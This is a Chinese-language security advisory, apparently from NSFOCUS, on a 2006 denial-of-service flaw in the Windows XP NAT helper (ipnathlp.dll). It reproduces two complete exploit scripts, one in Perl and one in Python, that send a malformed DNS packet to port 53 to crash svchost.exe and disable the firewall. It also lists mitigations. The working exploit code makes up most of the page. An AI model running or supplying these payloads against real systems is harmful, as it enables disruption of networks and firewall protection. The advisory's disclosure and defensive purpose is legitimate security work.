安全研究
安全漏洞
Microsoft Windows NAT帮助程序远程拒绝服务漏洞
发布日期:2006-10-30
更新日期:2006-11-02
受影响系统:
Microsoft Windows XP SP2描述:
Microsoft Windows XP SP1
Microsoft Windows XP
BUGTRAQ ID: 20804
Microsoft Windows是微软发布的非常流行的操作系统。
Microsoft Windows NAT帮助程序模块在处理畸形DNS报文时存在漏洞,远程攻击者可能利用此漏洞执行拒绝服务攻击。
如果Windows XP用户启用了Internet连接共享的话,则远程攻击者可以通过发送Additional RRs(也被称为Additional Information)部分包含有两个空字节的DNS报文导致服务和主机进程(svchost.exe)崩溃。由于ICS服务关系到防火墙服务,因此ICS崩溃就会导致防火墙服务失效。
<*来源:h07 (h07@interia.pl)
链接:http://www.networkworld.com/cgi-bin/mailto/x.cgi
http://blog.ncircle.com/archives/2006/10/microsoft_ics_d.htm
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
##
## Microsoft Windows NAT Helper Components Remote DoS Exploit (2)
## **************************************************************
##
## .details
## --------
## Exploit(192.168.0.2) --> Microsoft NAT(192.168.0.1) --> [..Internet..]
##
## .info
## -----
## code by x82 <x82_ [at] bk [dot] ru>
## bug by h07 <h07 [at] interia [dot] pl>
##
## .greetz
## -------
## ... goes out to triple6, wolf, lux2, EaTh, darkkilla, 2letterman .. ;)
##
##
use warnings;
use diagnostics;
use strict;
use IO::Socket;
my $host = $ARGV[0]; # 192.168.0.1
my $port = 53; # standard port
my $payload =
# by h07
"\x6c\xb6".
"\x01\x00".
"\x00\x00".
"\x00\x00".
"\x00\x00".
"\x00\x00". # <-- Bug is here 0x0000
"\x03\x77\x77\x77".
"\x06\x67\x6f\x6f".
"\x67\x6c\x65\x03".
"\x63\x6f\x6d\x00".
"\x00\x01".
"\x00\x01";
my $length = length($payload);
if((! $host || $host !~ /^\d{1,3}(\.\d{1,3}){3}$/))
{
print "\n----------------------------------------------------------------------\n";
print "Microsoft Windows NAT Helper Components Remote DoS Exploit\n";
print "exploit by x82 <x82_ [at] bk [dot] ru>\n";
print "bug discovered by h07 <h07 [at] interia [dot] pl>\n";
print "----------------------------------------------------------------------";
print "\n";
print "usage: perl $0 192.168.0.1\n";
exit;
}
my $socket = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => $port);
unless ($socket) { die "[-] Can\'t connect to $host" }
print "\n";
print "[+] connection established\n";
print "[*] Sending payload ..." . "(size: $length)\n";
sleep(5);
print $socket $payload;
print "[+] ok - payload sent\n";
## 29.10.2006
# milw0rm.com [2006-10-30]
===================================================================================
#!/usr/bin/python
# Microsoft Windows NAT Helper Components (ipnathlp.dll) 0day Remote DoS Exploit
# Bug discovered by h07 <h07@interia.pl>
# Tested on XP SP2 Polish
# Details:
#
# Exploit(192.168.0.2) --> Microsoft NAT(192.168.0.1) --> [..Internet..]
#
# [Process svchost.exe, module ipnathlp]
# --> MOV DL, [EAX]
# Exception C0000005 (ACCESS_VIOLATION reading [00000000])
##
from socket import *
from time import sleep
host = "192.168.0.1"
port = 53
buffer = ( # DNS (query)
"\x6c\xb6" # Transaction ID: 0x6cb6
"\x01\x00" # Flags: 0x0100 (Standard query)
"\x00\x00" # Questions: 0
"\x00\x00" # Answer RRs: 0
"\x00\x00" # Authority RRs: 0
"\x00\x00" # Additional RRs: 0 <-- Bug is here (0, 0, 0, 0)
"\x03\x77\x77\x77" #
"\x06\x67\x6f\x6f" #
"\x67\x6c\x65\x03" #
"\x63\x6f\x6d\x00" # Name: www.google.com
"\x00\x01" # Type: A (Host address)
"\x00\x01" # Class: IN (0x0001)
)
s = socket(AF_INET, SOCK_DGRAM)
s.connect((host, port))
s.send(buffer)
sleep(1)
s.close()
# EoF
# milw0rm.com [2006-10-28]
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
1) 禁用Internet连接共享。
2) 阻断UDP 53端口,手动将DNS服务器设置为ISP的DNS地址。
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/technet/security/
浏览次数:4288
严重程度:0(网友投票)
绿盟科技给您安全的保障